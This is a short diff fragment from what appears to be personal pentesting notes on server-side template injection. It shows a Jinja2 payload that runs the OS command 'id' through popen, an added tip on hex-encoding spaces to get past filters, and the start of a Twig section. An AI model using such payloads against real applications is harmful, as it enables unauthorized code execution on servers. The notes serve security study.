dnlvarga/dnlvarga.github.io/Web/ssti.md

 {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
 ```
 {% endraw %}
+*Note: if you have to put spaces in the command and get errors, try also hexadecimal encoding them with `\x20`.*
 ## Exploiting SSTI in Twig
 ### Information Disclosure
 Payload to get information about the current template: